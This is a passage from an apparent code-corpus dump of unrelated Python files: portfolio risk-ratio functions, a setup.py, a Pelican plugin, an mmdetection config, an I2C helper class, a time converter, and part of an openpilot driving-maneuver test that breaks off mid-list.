Sharpe(w, mu, cov=None, returns=None, rm=\"MV\", rf=0, alpha=0.05):\n r\"\"\"\n Calculate the Risk Adjusted Return Ratio from a portfolio returns series.\n\n .. math::\n \\text{Sharpe}(X) = \\frac{\\mathbb{E}(X) -\n r_{f}}{\\phi(X)}\n\n Where:\n\n :math:`X` is the vector of portfolio returns.\n\n :math:`r_{f}` is the risk free rate, when the risk measure is\n\n :math:`\\text{LPM}` uses instead of :math:`r_{f}` the :math:`\\text{MAR}`.\n\n :math:`\\phi(X)` is a convex risk measure. 
The risk measures availabe are:\n\n Parameters\n ----------\n\n w : DataFrame or 1d-array of shape (n_assets, 1)\n Weights matrix, where n_assets is the number of assets.\n mu : DataFrame or nd-array of shape (1, n_assets)\n Vector of expected returns, where n_assets is the number of assets.\n cov : DataFrame or nd-array of shape (n_features, n_features)\n Covariance matrix, where n_features is the number of features.\n returns : DataFrame or nd-array of shape (n_samples, n_features)\n Features matrix, where n_samples is the number of samples and\n n_features is the number of features.\n rm : str, optional\n Risk measure used in the denominator of the ratio. The default is\n 'MV'. Posible values are:\n\n - 'MV': Standard Deviation.\n - 'MAD': Mean Absolute Deviation.\n - 'MSV': Semi Standard Deviation.\n - 'FLPM': First Lower Partial Moment (Omega Ratio).\n - 'SLPM': Second Lower Partial Moment (Sortino Ratio).\n - 'VaR': Value at Risk.\n - 'CVaR': Conditional Value at Risk.\n - 'EVaR': Entropic Value at Risk.\n - 'WR': Worst Realization (Minimax)\n - 'MDD': Maximum Drawdown of uncompounded cumulative returns (Calmar Ratio).\n - 'ADD': Average Drawdown of uncompounded cumulative returns.\n - 'DaR': Drawdown at Risk of uncompounded cumulative returns.\n - 'CDaR': Conditional Drawdown at Risk of uncompounded cumulative returns.\n - 'EDaR': Entropic Drawdown at Risk of uncompounded cumulative returns.\n - 'UCI': Ulcer Index of uncompounded cumulative returns.\n - 'MDD_Rel': Maximum Drawdown of compounded cumulative returns (Calmar Ratio).\n - 'ADD_Rel': Average Drawdown of compounded cumulative returns.\n - 'CDaR_Rel': Conditional Drawdown at Risk of compounded cumulative returns.\n - 'EDaR_Rel': Entropic Drawdown at Risk of compounded cumulative returns.\n - 'UCI_Rel': Ulcer Index of compounded cumulative returns.\n\n rf : float, optional\n Risk free rate. 
The default is 0.\n alpha : float, optional\n Significance level of VaR, CVaR, EDaR, DaR, CDaR and EDaR.\n The default is 0.05.\n\n Raises\n ------\n ValueError\n When the value cannot be calculated.\n\n Returns\n -------\n value : float\n Risk adjusted return ratio of :math:`X`.\n\n \"\"\"\n\n w_ = np.array(w, ndmin=2)\n if w_.shape[0] == 1 and w_.shape[1] > 1:\n w_ = w_.T\n if w_.shape[0] > 1 and w_.shape[1] > 1:\n raise ValueError(\"weights must have n_assets x 1 size\")\n\n if cov is None and rm == \"MV\":\n raise ValueError(\"covariance matrix is necessary to calculate the sharpe ratio\")\n elif returns is None and rm != \"MV\":\n raise ValueError(\n \"returns scenarios are necessary to calculate the sharpe ratio\"\n )\n\n mu_ = np.array(mu, ndmin=2)\n\n if cov is not None:\n cov_ = np.array(cov, ndmin=2)\n if returns is not None:\n returns_ = np.array(returns, ndmin=2)\n\n ret = mu_ @ w_\n ret = ret.item()\n\n risk = Sharpe_Risk(w, cov=cov_, returns=returns_, rm=rm, rf=rf, alpha=alpha)\n\n value = (ret - rf) / risk\n\n return value\n\n\n###############################################################################\n# Risk Contribution Vectors\n###############################################################################\n\n\ndef Risk_Contribution(w, cov=None, returns=None, rm=\"MV\", rf=0, alpha=0.05):\n r\"\"\"\n Calculate the risk contribution for each asset based on the risk measure\n selected.\n\n Parameters\n ----------\n w : DataFrame or 1d-array of shape (n_assets, 1)\n Weights matrix, where n_assets is the number of assets.\n cov : DataFrame or nd-array of shape (n_features, n_features)\n Covariance matrix, where n_features is the number of features.\n returns : DataFrame or nd-array of shape (n_samples, n_features)\n Features matrix, where n_samples is the number of samples and\n n_features is the number of features.\n rm : str, optional\n Risk measure used in the denominator of the ratio. The default is\n 'MV'. Posible values are:\n\n - 'MV': Standard Deviation.\n - 'MAD': Mean Absolute Deviation.\n - 'MSV': Semi Standard Deviation.\n - 'FLPM': First Lower Partial Moment (Omega Ratio).\n - 'SLPM': Second Lower Partial Moment (Sortino Ratio).\n - 'VaR': Value at Risk.\n - 'CVaR': Conditional Value at Risk.\n - 'EVaR': Entropic Value at Risk.\n - 'WR': Worst Realization (Minimax)\n - 'MDD': Maximum Drawdown of uncompounded cumulative returns (Calmar Ratio).\n - 'ADD': Average Drawdown of uncompounded cumulative returns.\n - 'DaR': Drawdown at Risk of uncompounded cumulative returns.\n - 'CDaR': Conditional Drawdown at Risk of uncompounded cumulative returns.\n - 'EDaR': Entropic Drawdown at Risk of uncompounded cumulative returns.\n - 'UCI': Ulcer Index of uncompounded cumulative returns.\n - 'MDD_Rel': Maximum Drawdown of compounded cumulative returns (Calmar Ratio).\n - 'ADD_Rel': Average Drawdown of compounded cumulative returns.\n - 'CDaR_Rel': Conditional Drawdown at Risk of compounded cumulative returns.\n - 'EDaR_Rel': Entropic Drawdown at Risk of compounded cumulative returns.\n - 'UCI_Rel': Ulcer Index of compounded cumulative returns.\n\n rf : float, optional\n Risk free rate. 
The default is 0.\n alpha : float, optional\n Significance level of VaR, CVaR, EDaR, DaR, CDaR and EDaR.\n The default is 0.05.\n\n Raises\n ------\n ValueError\n When the value cannot be calculated.\n\n Returns\n -------\n value : float\n Risk measure of the portfolio.\n\n \"\"\"\n\n w_ = np.array(w, ndmin=2)\n if w_.shape[0] == 1 and w_.shape[1] > 1:\n w_ = w_.T\n if w_.shape[0] > 1 and w_.shape[1] > 1:\n raise ValueError(\"weights must have n_assets x 1 size\")\n\n if cov is not None:\n cov_ = np.array(cov, ndmin=2)\n if returns is not None:\n returns_ = np.array(returns, ndmin=2)\n\n RC = []\n d_i = 0.0000001\n\n for i in range(0, w_.shape[0]):\n delta = np.zeros((w_.shape[0], 1))\n delta[i, 0] = d_i\n w_1 = w_ + delta\n w_2 = w_ - delta\n a_1 = returns_ @ w_1\n a_2 = returns_ @ w_2\n if rm == \"MV\":\n risk_1 = w_1.T @ cov_ @ w_1\n risk_1 = np.sqrt(risk_1.item())\n risk_2 = w_2.T @ cov_ @ w_2\n risk_2 = np.sqrt(risk_2.item())\n elif rm == \"MAD\":\n risk_1 = MAD(a_1)\n risk_2 = MAD(a_2)\n elif rm == \"MSV\":\n risk_1 = SemiDeviation(a_1)\n risk_2 = SemiDeviation(a_2)\n elif rm == \"FLPM\":\n risk_1 = LPM(a_1, MAR=rf, p=1)\n risk_2 = LPM(a_2, MAR=rf, p=1)\n elif rm == \"SLPM\":\n risk_1 = LPM(a_1, MAR=rf, p=2)\n risk_2 = LPM(a_2, MAR=rf, p=2)\n elif rm == \"VaR\":\n risk_1 = VaR_Hist(a_1, alpha=alpha)\n risk_2 = VaR_Hist(a_2, alpha=alpha)\n elif rm == \"CVaR\":\n risk_1 = CVaR_Hist(a_1, alpha=alpha)\n risk_2 = CVaR_Hist(a_2, alpha=alpha)\n elif rm == \"EVaR\":\n risk_1 = EVaR_Hist(a_1, alpha=alpha)[0]\n risk_2 = EVaR_Hist(a_2, alpha=alpha)[0]\n elif rm == \"WR\":\n risk_1 = WR(a_1)\n risk_2 = WR(a_2)\n elif rm == \"MDD\":\n risk_1 = MDD_Abs(a_1)\n risk_2 = MDD_Abs(a_2)\n elif rm == \"ADD\":\n risk_1 = ADD_Abs(a_1)\n risk_2 = ADD_Abs(a_2)\n elif rm == \"DaR\":\n risk_1 = DaR_Abs(a_1, alpha=alpha)\n risk_2 = DaR_Abs(a_2, alpha=alpha)\n elif rm == \"CDaR\":\n risk_1 = CDaR_Abs(a_1, alpha=alpha)\n risk_2 = CDaR_Abs(a_2, alpha=alpha)\n elif rm == \"EDaR\":\n risk_1 = EDaR_Abs(a_1, alpha=alpha)[0]\n risk_2 = EDaR_Abs(a_2, alpha=alpha)[0]\n elif rm == \"UCI\":\n risk_1 = UCI_Abs(a_1)\n risk_2 = UCI_Abs(a_2)\n elif rm == \"MDD_Rel\":\n risk_1 = MDD_Rel(a_1)\n risk_2 = MDD_Rel(a_2)\n elif rm == \"ADD_Rel\":\n risk_1 = ADD_Rel(a_1)\n risk_2 = ADD_Rel(a_2)\n elif rm == \"DaR_Rel\":\n risk_1 = DaR_Rel(a_1, alpha=alpha)\n risk_2 = DaR_Rel(a_2, alpha=alpha)\n elif rm == \"CDaR_Rel\":\n risk_1 = CDaR_Rel(a_1, alpha=alpha)\n risk_2 = CDaR_Rel(a_2, alpha=alpha)\n elif rm == \"EDaR_Rel\":\n risk_1 = EDaR_Rel(a_1, alpha=alpha)[0]\n risk_2 = EDaR_Rel(a_2, alpha=alpha)[0]\n elif rm == \"UCI_Rel\":\n risk_1 = UCI_Rel(a_1)\n risk_2 = UCI_Rel(a_2)\n\n RC_i = (risk_1 - risk_2) / (2 * d_i) * w_[i, 0]\n RC.append(RC_i)\n\n RC = np.array(RC, ndmin=1)\n\n return RC\n"} {"ext": "py", "sha": "1a2ed91e678357e837cc805b58d9cba55a2abf29", "content": "#!/usr/bin/env python\n\ntry:\n from setuptools import setup\n requires = {\n 'install_requires': ['django >= 4.0'],\n }\nexcept ImportError:\n from distutils.core import setup\n requires = {}\n\nfrom os.path import abspath, dirname, join\n\nwith open(join(dirname(abspath(__file__)), 'src', 'rfdoc', 'version.py')) as f:\n exec(f.read())\n\n# Maximum width in Windows installer seems to be 70 characters -------|\nDESCRIPTION = \"\"\"\nRFDoc is a web application for storing and searching Robot Framework\ntest library and resource file documentations.\n\nRequired packages:\n django >= 4.0\n\"\"\"[1:-1]\n\nCLASSIFIERS = \"\"\"\nDevelopment Status :: 5 - 
Production/Stable\nLicense :: OSI Approved :: Apache Software License\nOperating System :: OS Independent\nProgramming Language :: Python\nTopic :: Software Development :: Testing\n\"\"\"[1:-1]\n\nsetup(\n name = 'robotframework-rfdoc',\n version = VERSION,\n description = 'Web-based Robot Framework library documentation server',\n long_description = DESCRIPTION,\n author = 'Robot Framework Developers',\n author_email = 'robotframework-devel@googlegroups.com',\n url = 'http://code.google.com/p/rfdoc/',\n license = 'Apache License 2.0',\n keywords = 'robotframework testing testautomation documentation',\n platforms = 'any',\n classifiers = CLASSIFIERS.splitlines(),\n package_dir = {'rfdoc': 'src/rfdoc'},\n packages = ['rfdoc', 'rfdoc.rfdocapp', 'rfdoc.rfdocapp.views',\n 'rfdoc.rfdocapp.templatetags', 'rfdoc.rfdocapp.utils'],\n package_data = {'rfdoc': ['*.tmpl', 'rfdocapp/templates/*.html',\n 'rfdocapp/static/*.css',\n 'rfdocapp/static/*.js']},\n **requires\n)\n"} {"ext": "py", "sha": "1a2ed92f3415b527cd451de99a65af6710e9de8e", "content": "text = \"\"\"\n//------------------------------------------------------------------------------\n// Explicit instantiation.\n//------------------------------------------------------------------------------\n#include \"Geometry/Dimension.hh\"\n#include \"IncrementFieldList.cc\"\n\nnamespace Spheral {\n template class IncrementFieldList, Dim< %(ndim)s >::Scalar>;\n template class IncrementFieldList, Dim< %(ndim)s >::Vector>;\n template class IncrementFieldList, Dim< %(ndim)s >::Vector3d>;\n template class IncrementFieldList, Dim< %(ndim)s >::Tensor>;\n template class IncrementFieldList, Dim< %(ndim)s >::SymTensor>;\n}\n\"\"\"\n"} {"ext": "py", "sha": "1a2ed9391a43aef205a579841ea907a66b02a0bb", "content": "from pelican import signals\nfrom pelican.generators import ArticlesGenerator, PagesGenerator\n\n# Make sure than when a title breaks, there will never be\n# a single word \"alone\" on its line\n# Does not work if the last \"word\" of the title is an emoji\n# in the form of an image (like Twemoji)\n\n# Title has to be more than four words\n# in order to be considered\nSMART_BREAK_MIN_LEN = 4\n\n\ndef smart_break(document):\n # Get the number of words\n splited = document.title.split(' ')\n length = len(splited)\n\n if length > SMART_BREAK_MIN_LEN:\n # Join the last two elements with a non-breaking space\n end = ' '.join(splited[length - 2:])\n # Get the start of the title back\n start = ' '.join(splited[:length-2])\n\n # Glue the title back together\n final = f'{start} {end}'\n\n # Write to a custom property\n # Writing the title directly leads to   not being\n # interpreted at various places\n document.smart_title = final\n\n\ndef run(generators):\n for g in generators:\n if isinstance(g, ArticlesGenerator):\n for a in g.articles:\n smart_break(a)\n if isinstance(g, PagesGenerator):\n for p in g.pages:\n smart_break(p)\n\n\ndef register():\n signals.all_generators_finalized.connect(run)\n"} {"ext": "py", "sha": "1a2eda00fae388833afb0376528a47736a300622", "content": "from werkzeug.local import LocalStack, LocalProxy\n\n\ndef _find_bot():\n from .wx import get_bot\n top = _wx_ctx_stack.top\n if top is None:\n top = get_bot()\n _wx_ctx_stack.push(top)\n return top\n\n\n_wx_ctx_stack = LocalStack()\ncurrent_bot = LocalProxy(_find_bot)\n"} {"ext": "py", "sha": "1a2edb2174b9c85e952fd7d274a2017cc64b1a9d", "content": "_base_ = 'faster_rcnn_r50_fpn_mstrain_3x_coco.py'\nmodel = dict(\n backbone=dict(\n norm_cfg=dict(requires_grad=False),\n norm_eval=True,\n 
style='caffe',\n init_cfg=dict(\n type='Pretrained',\n checkpoint='open-mmlab://detectron2/resnet50_caffe')))\n\n# use caffe img_norm\nimg_norm_cfg = dict(\n mean=[103.530, 116.280, 123.675], std=[1.0, 1.0, 1.0], to_rgb=False)\ntrain_pipeline = [\n dict(type='LoadImageFromFile'),\n dict(type='LoadAnnotations', with_bbox=True),\n dict(\n type='Resize',\n img_scale=[(1333, 640), (1333, 800)],\n multiscale_mode='range',\n keep_ratio=True),\n dict(type='RandomFlip', flip_ratio=0.5),\n dict(type='Normalize', **img_norm_cfg),\n dict(type='Pad', size_divisor=32),\n dict(type='DefaultFormatBundle'),\n dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels']),\n]\ntest_pipeline = [\n dict(type='LoadImageFromFile'),\n dict(\n type='MultiScaleFlipAug',\n img_scale=(1333, 800),\n flip=False,\n transforms=[\n dict(type='Resize', keep_ratio=True),\n dict(type='RandomFlip'),\n dict(type='Normalize', **img_norm_cfg),\n dict(type='Pad', size_divisor=32),\n dict(type='ImageToTensor', keys=['img']),\n dict(type='Collect', keys=['img']),\n ])\n]\n\ndata = dict(\n train=dict(dataset=dict(pipeline=train_pipeline)),\n val=dict(pipeline=test_pipeline),\n test=dict(pipeline=test_pipeline))"} {"ext": "py", "sha": "1a2edbb39b797f4afb516ce7671752d1cdfac609", "content": "import smbus2 as smbus\nimport ctypes\n\n\nclass I2cdev:\n def __init__(self, a_bus=1):\n self.bus = smbus.SMBus(a_bus)\n\n # I2Cdev::I2Cdev() { }\n\n # void I2Cdev::initialize() {\n # bcm2835_init();\n # bcm2835_i2c_set_baudrate( i2c_baudrate );\n # }\n\n # /** Enable or disable I2C, \n # * @param isEnabled true = enable, false = disable\n # */\n # void I2Cdev::enable(bool isEnabled) {\n # if ( set_I2C_pins ){\n # if (isEnabled)\n # bcm2835_i2c_end();\n # else\n # bcm2835_i2c_begin() ;\n # }\n # }\n\n\n\n\n # /** Read a single bit from an 8-bit device register.\n # * @param devAddr I2C slave device address\n # * @param regAddr Register regAddr to read from\n # * @param bitNum Bit position to read (0-7)\n # * @param data Container for single bit value\n # * @return Status of read operation (true = success)\n # */\n # int8_t - uint8_t devAddr, uint8_t regAddr, uint8_t bitNum, uint8_t *data\n def readBit(self, devAddr, regAddr, bitNum):\n data = self.bus.read_byte_data(devAddr, regAddr)\n return data & (1 << bitNum)\n \n\n # /** Read multiple bits from an 8-bit device register.\n # * @param devAddr I2C slave device address\n # * @param regAddr Register regAddr to read from\n # * @param bitStart First bit position to read (0-7)\n # * @param length Number of bits to read (not more than 8)\n # * @param data Container for right-aligned value (i.e. 
'101' read from any bitStart position will equal 0x05)\n # * @return Status of read operation (true = success)\n # */\n # int8_t\n # def readBits(uint8_t devAddr, uint8_t regAddr, uint8_t bitStart, uint8_t length, uint8_t *data):\n # # // 01101001 read byte\n # # // 76543210 bit numbers\n # # // xxx args: bitStart=4, length=3\n # # // 010 masked\n # # // -> 010 shifted\n # bcm2835_i2c_setSlaveAddress(devAddr);\n # sendBuf[0] = regAddr;\n # uint8_t response = bcm2835_i2c_write_read_rs(sendBuf, 1, recvBuf, 1);\n # uint8_t b = (uint8_t) recvBuf[0];\n # if (response == BCM2835_I2C_REASON_OK) {\n # uint8_t mask = ((1 << length) - 1) << (bitStart - length + 1);\n # b &= mask;\n # b >>= (bitStart - length + 1);\n # *data = b;\n # }\n # return response == BCM2835_I2C_REASON_OK;\n \n def readBits(self, devAddr, a_reg_add, a_bit_start, a_length):\n byte = self.bus.read_byte_data(devAddr, a_reg_add)\n mask = ((1 << a_length) - 1) << (a_bit_start - a_length + 1)\n byte &= mask\n byte >>= a_bit_start - a_length + 1\n return byte\n\n # /** Read single byte from an 8-bit device register.\n # * @param devAddr I2C slave device address\n # * @param regAddr Register regAddr to read from\n # * @param data Container for byte value read from device\n # * @return Status of read operation (true = success)\n # */\n # int8_t - uint8_t devAddr, uint8_t regAddr, uint8_t *data\n def readByte(self, devAddr, regAddr):\n return self.bus.read_byte_data(devAddr, regAddr)\n\n # /** Read multiple bytes from an 8-bit device register.\n # * @param devAddr I2C slave device address\n # * @param regAddr First register regAddr to read from\n # * @param length Number of bytes to read\n # * @param data Buffer to store read data in\n # * @return I2C_TransferReturn_TypeDef http://downloads.energymicro.com/documentation/doxygen/group__I2C.html\n # */\n # int8_t - uint8_t devAddr, uint8_t regAddr, uint8_t length, uint8_t *data\n # def readBytes(devAddr, regAddr, length):\n # bcm2835_i2c_setSlaveAddress(devAddr);\n # sendBuf[0] = regAddr;\n # uint8_t response = bcm2835_i2c_write_read_rs(sendBuf, 1, recvBuf, length);\n # int i ;\n # for (i = 0; i < length ; i++) {\n # data[i] = (uint8_t) recvBuf[i];\n # }\n # return response == BCM2835_I2C_REASON_OK;\n def readBytes(self, devAddr, a_address, a_length):\n # if a_length > len(a_data_list):\n # print('read_bytes, length of passed list too short')\n # return a_data_list\n # Attempt to use the built in read bytes function in the adafruit lib\n # a_data_list = self.__bus.read_i2c_block_data(self.__dev_id, a_address,\n # a_length)\n # Attempt to bypass adafruit lib\n #a_data_list = self.__mpu.bus.read_i2c_block_data(0x68, a_address, a_length)\n #print('data' + str(a_data_list))\n a_data_list = list()\n for x in range(0, a_length):\n # print(\"x:{}\".format(x))\n a_data_list.append(self.bus.read_byte_data(devAddr, a_address + x))\n return a_data_list\n \n \n # /** Read single word from a 16-bit device register.\n # * @param devAddr I2C slave device address\n # * @param regAddr Register regAddr to read from\n # * @param data Container for word value read from device\n # * @return Status of read operation (true = success)\n # */\n # int8_t - uint8_t devAddr, uint8_t regAddr, uint16_t *data\n # def readWord(self, devAddr, regAddr):\n # return self.bus.read_word_data(devAddr, regAddr)\n\n # /** Read multiple words from a 16-bit device register.\n # * @param devAddr I2C slave device address\n # * @param regAddr First register regAddr to read from\n # * @param length Number of words to read\n # * 
@param data Buffer to store read data in\n # * @return Number of words read (-1 indicates failure)\n # */\n # int8_t \n # def readWords(uint8_t devAddr, uint8_t regAddr, uint8_t length, uint16_t *data):\n # bcm2835_i2c_setSlaveAddress(devAddr);\n # sendBuf[0] = regAddr;\n # uint8_t response = bcm2835_i2c_write_read_rs(sendBuf, 1, recvBuf, length*2 );\n # uint8_t i;\n # for (i = 0; i < length; i++) {\n # data[i] = (recvBuf[i*2] << 8) | recvBuf[i*2+1] ;\n # }\n # return response == BCM2835_I2C_REASON_OK ;\n\n # /** write a single bit in an 8-bit device register.\n # * @param devAddr I2C slave device address\n # * @param regAddr Register regAddr to write to\n # * @param bitNum Bit position to write (0-7)\n # * @param value New bit value to write\n # * @return Status of operation (true = success)\n # */\n # bool - uint8_t devAddr, uint8_t regAddr, uint8_t bitNum, uint8_t data\n def writeBit(self, devAddr, regAddr, bitNum, data):\n prev_data = self.bus.read_byte_data(devAddr, regAddr)\n next_data = 0\n if data != 0:\n next_data = (prev_data | (1 << bitNum))\n else:\n next_data = (prev_data & ~(1 << bitNum))\n self.bus.write_byte_data(devAddr, regAddr, next_data)\n # self.bus.write_byte_data(devAddr, regAddr, ctypes.c_int8(next_data).value)\n \n # def write_bit(self, devAddr, a_reg_add, a_bit_num, a_bit):\n # byte = self.bus.read_byte_data(self.__dev_id, a_reg_add)\n # if a_bit:\n # byte |= 1 << a_bit_num\n # else:\n # byte &= ~(1 << a_bit_num)\n # self.bus.write_byte_data(\n # self.__dev_id, a_reg_add, ctypes.c_int8(byte).value)\n \n \n \n\n # /** Write multiple bits in an 8-bit device register.\n # * @param devAddr I2C slave device address\n # * @param regAddr Register regAddr to write to\n # * @param bitStart First bit position to write (0-7)\n # * @param length Number of bits to write (not more than 8)\n # * @param data Right-aligned value to write\n # * @return Status of operation (true = success)\n # */\n # bool \n # def writeBits(uint8_t devAddr, uint8_t regAddr, uint8_t bitStart, uint8_t length, uint8_t data):\n # # // 010 value to write\n # # // 76543210 bit numbers\n # # // xxx args: bitStart=4, length=3\n # # // 00011100 mask byte\n # # // 10101111 original value (sample)\n # # // 10100011 original & ~mask\n # # // 10101011 masked | value\n # bcm2835_i2c_setSlaveAddress(devAddr);\n # # //first reading registery value\n # sendBuf[0] = regAddr;\n # uint8_t response = bcm2835_i2c_write_read_rs(sendBuf, 1, recvBuf, 1 );\n # if ( response == BCM2835_I2C_REASON_OK ) {\n # uint8_t b = recvBuf[0];\n # uint8_t mask = ((1 << length) - 1) << (bitStart - length + 1);\n # data <<= (bitStart - length + 1); // shift data into correct position\n # data &= mask; // zero all non-important bits in data\n # b &= ~(mask); // zero all important bits in existing byte\n # b |= data; // combine data with existing byte\n # sendBuf[1] = b ;\n # response = bcm2835_i2c_write(sendBuf, 2);\n # }\n # return response == BCM2835_I2C_REASON_OK;\n \n def writeBits(self, devAddr, a_reg_add, a_bit_start, a_length, a_data):\n byte = self.bus.read_byte_data(devAddr, a_reg_add)\n mask = ((1 << a_length) - 1) << (a_bit_start - a_length + 1)\n # Get data in position and zero all non-important bits in data\n a_data <<= a_bit_start - a_length + 1\n a_data &= mask\n # Clear all important bits in read byte and combine with data\n byte &= ~mask\n byte = byte | a_data\n # Write the data to the I2C device\n # self.__bus.write_byte_data(self.__dev_id, a_reg_add, ctypes.c_int8(byte).value)\n self.bus.write_byte_data(devAddr, a_reg_add, 
byte)\n\n # /** Write single byte to an 8-bit device register.\n # * @param devAddr I2C slave device address\n # * @param regAddr Register address to write to\n # * @param data New byte value to write\n # * @return Status of operation (true = success)\n # */\n # bool - uint8_t devAddr, uint8_t regAddr, uint8_t data\n def writeByte(self, devAddr, regAddr, data):\n self.bus.write_byte_data(devAddr, regAddr, data)\n\n # bool \n # def writeBytes(uint8_t devAddr, uint8_t regAddr, uint8_t length, uint8_t *data):\n # bcm2835_i2c_setSlaveAddress(devAddr);\n # sendBuf[0] = regAddr;\n # uint8_t i;\n # for (i = 0; i < length; i++) {\n # sendBuf[i+1] = data[i] ;\n # }\n # uint8_t response = bcm2835_i2c_write(sendBuf, 1+length);\n # return response == BCM2835_I2C_REASON_OK ;\n \n # bool - uint8_t devAddr, uint8_t regAddr, uint16_t data\n def writeWord(self, devAddr, regAddr, data):\n self.bus.write_word_data(devAddr, regAddr, data)\n\n # bool \n # def writeWords(uint8_t devAddr, uint8_t regAddr, uint8_t length, uint16_t *data):\n # bcm2835_i2c_setSlaveAddress(devAddr);\n # sendBuf[0] = regAddr;\n # uint8_t i;\n # for (i = 0; i < length; i++) {\n # sendBuf[1+2*i] = (uint8_t) (data[i] >> 8); //MSByte\n # sendBuf[2+2*i] = (uint8_t) (data[i] >> 0); //LSByte\n # }\n # uint8_t response = bcm2835_i2c_write(sendBuf, 1+2*length);\n # return response == BCM2835_I2C_REASON_OK ;\n"} {"ext": "py", "sha": "1a2edc555fdf1d04a6698fb3713254ffa32e7c81", "content": "def time_converter(string):\n string = string.split()\n hora = int(string[0][1])+(10*int(string[0][0]))\n if hora>=18:\n hora_pm = hora-12\n lista = [str(hora_pm), string[0][2], string[0][3], string[0][4], ' p.m.']\n lista = ''.join(lista)\n return lista\n else:\n if hora>=12:\n string.append(' p.m.')\n string = ''.join(string)\n return string\n else:\n if hora==0:\n lista = ['12', string[0][2], string[0][3], string[0][4], ' a.m.']\n string = ''.join(lista)\n return string\n elif hora<10 and hora!=0:\n string.append(' a.m.')\n string = ''.join(string)\n return string[1:]\n else:\n return string\n\nprint(time_converter('12:30'))\nprint(time_converter('09:00'))\nprint(time_converter('23:15'))\nprint(time_converter('00:30'))\nprint(time_converter('00:00'))"} {"ext": "py", "sha": "1a2edc63eae0a1495b0654d3138a54b6bd8f5a57", "content": "#!/usr/bin/env python3\nimport os\nos.environ['NOCRASH'] = '1'\n\nimport unittest\nimport matplotlib\nmatplotlib.use('svg')\n\nfrom selfdrive.config import Conversions as CV\nfrom selfdrive.car.honda.values import CruiseButtons as CB\nfrom selfdrive.test.longitudinal_maneuvers.maneuver import Maneuver\nfrom selfdrive.manager.process_config import managed_processes\nfrom common.file_helpers import mkdirs_exists_ok\nfrom common.params import Params\n\n\ndef check_no_collision(log):\n return min(log['d_rel']) > 0\n\n\ndef check_fcw(log):\n return any(log['fcw'])\n\n\ndef check_engaged(log):\n return log['controls_state_msgs'][-1][-1].active\n\n\nmaneuvers = [\n Maneuver(\n 'while cruising at 40 mph, change cruise speed to 50mph',\n duration=30.,\n initial_speed=40. * CV.MPH_TO_MS,\n cruise_button_presses=[(CB.DECEL_SET, 2.), (0, 2.3),\n (CB.RES_ACCEL, 10.), (0, 10.1),\n (CB.RES_ACCEL, 10.2), (0, 10.3)],\n checks=[check_engaged],\n ),\n Maneuver(\n 'while cruising at 60 mph, change cruise speed to 50mph',\n duration=30.,\n initial_speed=60. 
* CV.MPH_TO_MS,\n cruise_button_presses=[(CB.DECEL_SET, 2.), (0, 2.3),\n (CB.DECEL_SET, 10.), (0, 10.1),\n (CB.DECEL_SET, 10.2), (0, 10.3)],\n checks=[check_engaged],\n ),\n Maneuver(\n 'while cruising at 20mph, uphill grade of 10%',\n duration=25.,\n initial_speed=20. * CV.MPH_TO_MS,\n cruise_button_presses=[(CB.DECEL_SET, 1.2), (0, 1.3)],\n grade_values=[0., 0., .1],\n grade_breakpoints=[0., 10., 11.],\n checks=[check_engaged],\n ),\n Maneuver(\n 'while cruising at 20mph, downhill grade of -10%',\n duration=25.,\n initial_speed=20. * CV.MPH_TO_MS,\n cruise_button_presses=[(CB.DECEL_SET, 1.2), (0, 1.3)],\n grade_values=[0., 0., -.1],\n grade_breakpoints=[0., 10., 11.],\n checks=[check_engaged],\n ),\n Maneuver(\n 'approaching a 40mph car while cruising at 60mph from 100m away',\n duration=30.,\n initial_speed=60. * CV.MPH_TO_MS,\n lead_relevancy=True,\n initial_distance_lead=100.,\n speed_lead_values=[40. * CV.MPH_TO_MS, 40. * CV.MPH_TO_MS],\n speed_lead_breakpoints=[0., 100.],\n cruise_button_presses=[(CB.DECEL_SET, 1.2), (0, 1.3)],\n checks=[check_engaged, check_no_collision],\n ),\n Maneuver(\n 'approaching a 0mph car while cruising at 40mph from 150m away',\n duration=30.,\n initial_speed=40. * CV.MPH_TO_MS,\n lead_relevancy=True,\n initial_distance_lead=150.,\n speed_lead_values=[0. * CV.MPH_TO_MS, 0. * CV.MPH_TO_MS],\n speed_lead_breakpoints=[0., 100.],\n cruise_button_presses=[(CB.DECEL_SET, 1.2), (0, 1.3)],\n checks=[check_engaged, check_no_collision],\n ),\n Maneuver(\n 'steady state following a car at 20m/s, then lead decel to 0mph at 1m/s^2',\n duration=50.,\n initial_speed=20.,\n lead_relevancy=True,\n initial_distance_lead=35.,\n speed_lead_values=[20., 20., 0.],\n speed_lead_breakpoints=[0., 15., 35.0],\n cruise_button_presses=[(CB.DECEL_SET, 1.2), (0, 1.3)],\n checks=[check_engaged, check_no_collision],\n ),\n Maneuver(\n 'steady state following a car at 20m/s, then lead decel to 0mph at 2m/s^2',\n duration=50.,\n initial_speed=20.,\n lead_relevancy=True,\n initial_distance_lead=35.,\n speed_lead_values=[20., 20., 0.],\n speed_lead_breakpoints=[0., 15., 25.0],\n cruise_button_presses=[(CB.DECEL_SET, 1.2), (0, 1.3)],\n checks=[check_engaged, check_no_collision],\n ),\n Maneuver(\n 'steady state following a car at 20m/s, then lead decel to 0mph at 3m/s^2',\n duration=50.,\n initial_speed=20.,\n lead_relevancy=True,\n initial_distance_lead=35.,\n speed_lead_values=[20., 20., 0.],\n speed_lead_breakpoints=[0., 15., 21.66],\n cruise_button_presses=[(CB.DECEL_SET, 1.2), (0, 1.3)],\n checks=[check_engaged, check_fcw],\n ),\n Maneuver(\n 'steady state following a car at 20m/s, then lead decel to 0mph at 5m/s^2',\n duration=40.,\n initial_speed=20.,\n lead_relevancy=True,\n initial_distance_lead=35.,\n speed_lead_values=[20., 20., 0.],\n speed_lead_breakpoints=[0., 15., 19.],\n cruise_button_presses=[(CB.DECEL_SET, 1.2), (0, 1.3)],\n checks=[check_engaged, check_fcw],\n ),\n Maneuver(\n 'starting at 0mph, approaching a stopped car 100m away',\n duration=30.,\n initial_speed=0.,\n lead_relevancy=True,\n initial_distance_lead=100.,\n cruise_button_presses=[(CB.DECEL_SET, 1.2), (0, 1.3),\n (CB.RES_ACCEL, 1.4), (0.0, 1.5),\n (CB.RES_ACCEL, 1.6), (0.0, 1.7),\n (CB.RES_ACCEL, 1.8), (0.0, 1.9)],\n checks=[check_engaged, check_no_collision],\n ),\n Maneuver(\n \"following a car at 60mph, lead accel and decel at 0.5m/s^2 every 2s\",\n duration=25.,\n initial_speed=30.,\n lead_relevancy=True,\n initial_distance_lead=49.,\n speed_lead_values=[30., 30., 29., 31., 29., 31., 29.],\n 
